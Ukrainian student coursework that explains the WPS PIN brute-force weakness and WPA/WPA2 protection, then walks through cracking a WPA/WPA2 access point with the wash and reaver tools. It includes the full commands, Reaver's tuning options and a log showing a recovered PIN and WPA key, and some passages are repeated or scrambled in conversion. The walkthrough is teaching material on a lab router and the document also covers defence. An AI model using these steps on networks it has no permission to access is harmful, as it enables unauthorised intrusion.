Перебір ключа WEP
<#"651053.files/image002.gif">
Рисунок 1.2 - Airodump-ng 0.5
Fi Protected Setup(WPS)
(захищена установка), WPS - стандарт (і однойменний протокол)
напівавтоматичного створення бездротової мережі Wi-Fi, створений Wi-Fi
Alliance. Офіційно запущений 8 січня 2007.
Метою протоколу WPS є спрощення
процесу установки бездротової мережі, тому спочатку він називався Wi-Fi
SimpleConfig. Протокол покликаний надати допомогу користувачам, які не
володіють широкими знаннями про безпеку в бездротових мережах, і як наслідок,
мають складнощі при здійсненні налаштувань. WPS автоматично позначає ім'я
мережі і задає шифрування, для захисту від несанкціонованого доступу в мережу,
при цьому немає необхідності вручну задавати всі параметри.
У роутерах компанії TP-Link функція
називається QSS (Quick Security Setup) і виконує аналогічні функції. Доступна
авторизація по PIN-коду.
Уразливість WPS
У грудні 2011 Стефан Фібек (англ.
StefanViehböck) і
КрейгХеффнер (англ. Craig Heffner) розповіли про серйозні діри в протоколі WPS.
Виявилося, що якщо в точці доступу активований WPS c PIN (який за замовчуванням
включений в більшості роутерів), то підібрати PIN-код для підключення можна за
лічені години!код складається з восьми цифр - отже, існує 108 (100'000'000)
варіантів для підбору. Однак кількість варіантів можна істотно скоротити.
Справа в тому, що остання цифра PIN-коду являє собою якусь контрольну суму, яка
вираховується на підставі семи перших цифр. У підсумку отримуємо вже 107
(10'000'000) варіантів. Уразливість протоколу дозволяє розділити пін-код на дві
частини, 4 і 3 цифри і перевіряти кожну, на валідність окремо. Отже отримуємо
104 (10'000) варіантів для першої половини і 103 (1000) для другої. У підсумку,
всього лише 11'000 варіантів для повного перебору, що в ~ 910 разів менше.
Захист від злому
Захиститися від атаки можна поки
одним способом - відключити WPS в налаштуваннях роутера. Правда, зробити це
можливо далеко не завжди. Оскільки уразливість існує не на рівні реалізації, а
на рівні протоколу. Найбільше, що можуть зробити виробники, випустити прошивку,
що дозволяє вводити таймаут на блокування користувача, наприклад, після 5
невдалих спроб введення PIN-коду, що ускладнить брутфорс і збільшить час
підбору ідентифікатора зловмисником. Інший шлях - використовувати в PIN не
тільки цифри, але й букви.
Рисунок 1.3 - кнопка WPS на
бездротовому роутері
код складається з восьми цифр -
отже, існує 10 ^ 8 (100 000 000) варіантів для підбору. Однак кількість
варіантів можна істотно скоротити. Справа в тому, що остання цифра PIN-коду
являє собою якусь контрольну суму, яка вираховується на підставі семи перших
цифр. У підсумку отримуємо вже 10 ^ 7 (10 000 000) варіантів. Але і це ще не
все! Далі уважно дивимося на пристрій протоколу аутентифікації WPS (малюнок
3.4). Таке відчуття, що його спеціально проектували, щоб залишити можливість
для брутфорса. Виявляється, перевірка PIN-коду здійснюється в два етапи. Він
ділиться на дві рівні частини, і кожна частина перевіряється окремо.
Рисунок 1.4- протокол аутентифікації
WPS
Якщо після відсилання повідомлення
M4 атакуючий отримав у відповідь EAP-NACK, то він може бути впевнений, що перша
частина PIN-коду неправильна.
Якщо ж він отримав EAP-NACK після
відсилання M6, то, відповідно, друга частина PIN-коду невірна. Отримуємо 10 ^ 4
(10 000) варіантів для першої половини і 10 ^ 3 (1 000) для другої. У підсумку
маємо всього лише 11 000 варіантів для повного перебору. Щоб краще зрозуміти,
як це буде працювати, подивися на схему.
WPA та WPA2
(Wi-Fi Protected Access) - являє
собою оновлену програму сертифікації пристроїв бездротового зв'язку. Технологія
WPA прийшла на заміну технології захисту бездротових мереж WEP. Плюсами WPA є
посилена безпека даних і посилений контроль доступу до бездротових мереж.
Важливою характеристикою є сумісність між безліччю бездротових пристроїв ,як на
апаратному рівні, так і на програмному. На даний момент WPA і WPA2
розробляються і просуваються організацією Wi-Fi Alliance.
У WPA забезпечена підтримка
стандартів 802.1X, а також протоколу EAP (Extensible Authentication Protocol,
розширюваний протокол автентифікації). Варто зауважити, що в WPA2 підтримується
шифрування у відповідності зі стандартом AES (Advanced Encryption Standard,
вдосконалений стандарт шифрування), який має ряд переваг над використовуваним в
WEP RC4, наприклад набагато більш стійкий криптоалгоритм.
Великим плюсом при впровадженні EWPA
є можливість роботи технології на існуючому апаратному забезпеченні Wi-Fi.
Деякі відмітні особливості WPA:
удосконалена схема шифрування RC4
обов'язкова аутентифікація з
використанням EAP.
система централізованого управління
безпекою, можливість використання в діючих корпоративних політиках безпеки.
Навіть не беручи до уваги той факт
що WEP, попередник WPA, не володіє механізмами аутентифікації користувачів як
такий, його ненадійність полягає, передусім, в криптографічній слабкості
алгоритму шифрування. Ключова проблема WEP полягає у використанні занадто
схожих ключів для різних пакетів даних., MIC і 802.1X (частини рівняння WPA)
внесли свою лепту в посилення шифрування даних мереж, що використовують
WPA.відповідає за збільшення розміру ключа з 40 до 128 біт, а також за заміну
одного статичного ключа WEP ключами, які автоматично генеруються і розсилаються
сервером аутентифікації. Крім того, в TKIP використовується спеціальна ієрархія
ключів та методологія управління ключами, яка прибирає зайву передбачуваність,
яка використовувалася для несанкціонованого зняття захисту WEP ключів.
Сервер аутентифікації, після
одержання сертифіката від користувача, використовує 802.1X для генерації
унікального базового ключа для сеансу зв'язку. TKIP здійснює передачу
згенерованого ключа користувачеві і точці доступу, після чого вибудовує
ієрархію ключів плюс систему управління. Для цього використовується
двосторонній ключ для динамічної генерації ключів шифрування даних, які в свою
чергу використовуються для шифрування кожного пакету даних. Подібна ієрархія
ключів TKIP замінює один ключ WEP (статичний) на 500 мільярдів можливих ключів,
які будуть використані для шифрування даного пакету даних.
Іншим важливим механізмом є
перевірка цілісності повідомлень (Message Integrity Check, MIC). Її
використовують для запобігання перехоплення пакетів даних, зміст яких може бути
змінено, а модифікований пакет знову переданий по мережі. MIC побудована на
основі потужної математичної функції, яка застосовується на стороні відправника
і одержувача, після чого порівнюється результат. Якщо перевірка показує на
розбіжність результатів обчислень, дані вважаються помилковими і пакет
відкидається.
При цьому механізми шифрування, які
використовуються для WPA і WPA-PSK, є ідентичними. Єдина відмінність WPA-PSK
полягає в тому, що аутентифікація проводиться з використанням пароля, а не по
сертифікату користувача.
2. Опис роботи
операційний точка доступ зламування
2.1 Встановлення інструменту Reaver
Починаючи з версії Ubuntu 12.04,
aircrack-ng не міститься в репозиторіях Ubuntu, але не варто засмучуватися. Ви
також можете завантажити ісходники з офіційного сайту. Для встановлення
потрібно виконати декілька простих дій.
За допомогою терміналу виконаємо
установку Reaver:#"651053.files/image005.gif">
Рисунок 2.1 - виконання команди
airodump-ng
На екрані з'явиться список точок
доступу в радіусі досяжності. Нас цікавлять точки з шифруванням WPA/WPA2 і
аутентифікацією по ключу PSK. Краще вибирати одну з перших у списку, так як для
проведення атаки бажаний хороший зв'язок з крапкою Якщо точок багато і список
не вміщується на екрані, то можна скористатися іншою відомою утилітою - kismet,
там інтерфейс більш пристосований в цьому плані. Опціонально можна на місці
перевірити, чи включений на нашій точці механізм WPS. Для цього в комплекті з
Reaver (але тільки якщо брати його з SVN) йде утиліта wash:
$ ./wash -i mon0
Рисунок 2.2 - виконання команди wash
В якості параметра задається ім'я інтерфейсу,
переведеного в режим моніторингу. Також можна використовувати опцію '-f' і
згодувати утиліті. Cap файл, створений, наприклад, тим же airodump-ng.
Запуск брутфорс :
Тепер можна приступати безпосередньо
до перебору PIN'а. Для старту Reaver в самому простому випадку потрібно
небагато. Необхідно лише вказати ім'я інтерфейсу (переведеного нами раніше в
режим моніторингу) і BSSID точки доступу:
$ reaver -i mon0 -b
64:72:02:83:F8:14 -vv
Ключ "-vv" включає
розширений висновок програми, щоб ми могли переконатися, що все працює як
треба.
Рисунок 2.3 - виконання команди
reaver
Рисунок 2.4 - PIN встановлений на
роутері
Після закінчення підбору PIN
отримуємо пароль точки доступу та можливість підключення до неї :
v1.3 WiFiProtectedSetupAttackTool(c)
2011, TacticalNetworkSolutions, CraigHeffner<cheffner@tacnetsol.com>
[+]
Waitingforbeaconfrom64:72:02:83:F8:14
[+]
Associatedwith64:72:02:83:F8:14(ESSID: Kurs_Work')
[+] 0.04% complete @ 2012-01-22
03:01:06 (5 seconds/attempt)
[+] 0.05% complete @ 2012-01-22
03:01:22 (6 seconds/attempt)
[+] 96.76% complete @ 2012-01-22
05:00:31 (4 seconds/attempt)
[+] 96.81% complete @ 2012-01-22
05:00:46 (4 seconds/attempt)
[+] 96.83% complete @ 2012-01-22
05:01:07 (4 seconds/attempt)
[+] 96.85% complete @ 2012-01-22
05:01:30 (4 seconds/attempt)
[+] 96.89% complete @ 2012-01-22
05:01:43 (4 seconds/attempt)
[+] 96.92% complete @ 2012-01-22
05:02:00 (4 seconds/attempt)
[+] 96.96% complete @ 2012-01-22
05:02:14 (4 seconds/attempt)
[+] 97.01% complete @ 2012-01-22
05:02:29 (4 seconds/attempt)
[+] 97.03% complete @ 2012-01-22
05:02:41 (4 seconds/attempt)
[+] 97.05% complete @ 2012-01-22
05:03:15 (4 seconds/attempt)
[+] 97.09% complete @ 2012-01-22
05:03:29 (4 seconds/attempt)
[+] 97.14% complete @ 2012-01-22
05:03:44 (4 seconds/attempt)
[+] WPS PIN: '14937125'
[+] WPA PSK:
'elNpTxD2uimQX2b/MpDKb0UL7'
[+] AP SSID: 'Kurs_Work'
Рисунок 2.5 - пароль роутера
Нижче наведені додаткові опції, які
можуть підвищити швидкість і ефективність перебору ключа.
Можна задати номер каналу і SSID
точки доступу:
# Reaver-i mon0-b
00:01:02:03:04:05-c 11-e linksys
Добре позначається на швидкості
брутфорса опція '- dh-small', яка задає невелике значення секретного ключа, тим
самим полегшуючи розрахунки на стороні точки доступу:
# Reaver-i mon0-b
00:01:02:03:04:05-vv - dh-small
Таймаут очікування відповіді за
замовчуванням дорівнює п'яти секундам. При необхідності його можна змінити:
# Reaver-i mon0-b
00:01:02:03:04:05-t 2
Затримка між спробами за
замовчуванням дорівнює одній секунді. Вона також може бути налаштована: #
Reaver-i mon0-b 00:01:02:03:04:05-d 0
Деякі точки доступу можуть блокувати
WPS на певний час. Reaver цю ситуацію помічає і робить паузу в переборі на 315
секунд за замовчуванням, тривалість цієї паузи можна змінювати: # Reaver-i
mon0-b 00:01:02:03:04:05 - lock-delay = 250
Деякі реалізації протоколу WPS
розривають з'єднання при неправильному PIN-коді, хоча по специфікації повинні
повертати особливе повідомлення. Reaver автоматично розпізнає таку ситуацію,
для цього існує опція '- nack':
# Reaver-i mon0-b 00:01:02:03:04:05
- nack
Опція '- eap-terminate' призначена
для роботи з тими АР, які потребують завершення WPS-сесії за допомогою
повідомлення EAP FAIL:
# Reaver-i mon0-b 00:01:02:03:04:05
- eap-terminate
Виникнення помилок у WPS-сесії може
означати, що АР обмежує число спроб введення PIN-коду, або просто перевантажена
запитами. Інформація про це буде відображатися на екрані. У цьому випадку
Reaver призупиняє свою діяльність, причому час паузи може бути задано за
допомогою опції '- fail-wait':
# Reaver-i mon0-b 00:01:02:03:04:05
- fail-wait = 360
Висновки
Отримано
[+] WPS PIN: '14937125'
[+] WPA PSK:
'elNpTxD2uimQX2b/MpDKb0UL7'
Чи можна захиститися ?
Так, захиститися від атаки можна,
але поки що одним способом - відключити WPS в налаштуваннях роутера. Щоправда,
як виявилося, зробити це можливо далеко не завжди. Оскільки уразливість існує
не на рівні реалізації, а на рівні протоколу.
Список використаних джерел
1) 1.Завантаження Linux[Електронний ресурс]
//Download Linux Mint 13 Nadia - Режим доступу до
статті:<http://www.linuxmint.com/download.php>
) Взломать Wi-Fi за 10 часов[Електронний
ресурс] //Журнал Хакер- Режим доступу до статті:<http://habrahabr.ru/company/xakep/blog/143834/>
) Reaver. Взлом Wi-Fi сети[Електронний
ресурс] //Levinkv'sBlog - Информационная Безопасность- Режим доступу до
статті:<http://www.levinkv.ru/wi-fi/reaver-vzlom-wi-fi-seti.html>
) Как установить reaver и
aircrack-ng[Електронний ресурс] //ITcollider.Ru » Технические темы »
Программное обеспечение » Linuxoid »Хакер- Режим доступу до
статті:<http://itcollider.ru/forum/linuxoid/1179-kak-ustanovit-reaver-i-aircrack-ng-na-ubuntu-12-04-a.html>
) Aircrack-ng[Електронний ресурс] //Вікіпедія
- вільна енциклопедія - 2010. - Режим доступу до
статті:<http://ru.wikipedia.org/wiki/Aircrack-ng>
) Wi-Fi ProtectedSetup[Електронний
ресурс] // Вікіпедія - вільна енциклопедія- Режим доступу до статті:<http://ru.wikipedia.org/wiki/Wi-Fi_Protected_Setup>
) Using Reaveron Ubuntu 10.04
[Електронний ресурс] //Mike's Computer Stuff- Режим доступу до статті:
https://www.sites.google.com/site/mikescomputerstuff/using-reaver-on-ubuntu-10-04
Похожие работы на - Зламування Wi-Fi точки доступу з захистом WPA/WPA2 за допомогою операційної системи Linux Mint 13
|